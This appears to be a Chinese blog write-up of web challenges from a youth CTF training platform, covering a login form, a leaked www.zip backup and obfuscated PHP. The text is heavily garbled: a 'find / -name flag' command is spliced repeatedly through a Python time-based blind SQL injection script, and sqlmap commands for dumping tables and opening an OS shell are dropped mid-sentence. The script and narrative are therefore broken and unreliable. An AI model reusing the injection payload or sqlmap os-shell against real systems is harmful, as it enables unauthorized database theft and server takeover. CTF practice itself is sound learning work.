[青少年CTF训练平台]web部分题解(已完结!)
文章管理系统起首打开情况(>ω{j},sleep(0.5),0)#"find / -name "flag"find / -name "flag"payload = f"if(ascii(substr((select group_concat(password) from users),{i},1))>{j},sleep(0.5),0)#"find / -name "flag"find / -name "flag"data = {find / -name "flag"find / -name "flag"find / -name "flag"'uname': "admin' and "+payload,find / -name "flag"find / -name "flag"find / -name "flag"'psw':123456find / -name "flag"find / -name "flag"}find / -name "flag"find / -name "flag"try:find / -name "flag"find / -name "flag"find / -name "flag"r = requests.post(url=url, data=data,timeout=0.2)find / -name "flag"find / -name "flag"except Exception as e:find / -name "flag"find / -name "flag"find / -name "flag"continuefind / -name "flag"find / -name "flag" res += chr(j)find / -name "flag"find / -name "flag"print(res)find / -name "flag"find / -name "flag"break 得到flag:
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240307111257003-1102818597.png
sqlmap -u http://challenge.qsnctf.com:31645/?id=1 --dbs雏形系统
打开情况后映入眼帘的是登陆系统,那就像之前一样思量sql 以及弱口令:
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240307151812161-186735590.png
结果折腾半天啥也没有,这是一个可修改的界面,那没办法了试一试dirsearch扫描:
kali启动!
sqlmap -u http://challenge.qsnctf.com:31645/?id=1 -D ctftraining -T test --dumphttps://img2024.cnblogs.com/blog/3367319/202403/3367319-20240307161051778-861861200.jpg
扫面到了www.zip
那可以直接打开了:
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240307161442284-787202970.png
解压以后出现两个文件,看过以后robots.txt里边没东西直接打开“qsnctf.php”就可以了
qsnctf.php
sqlmap -u "http://challenge.qsnctf.com:32030/?id=1" --os-shell审计完以后,去掉无用的图层一系列代码,剩下用的就是
find / -name "flag"打眼一看混淆,考的还挺新的,给大家送一个博客,我只讲这题。。。0.0“奇安信攻防社区-phpjm混淆解密浅谈”
先把qsnctf.php的eval改成echo
得出这个乱七八糟的东西:
qsnctf{5a73aa45b44b409a815a4051428a3e11}更换:
这样就得到了源码,长这样:
页:
[1]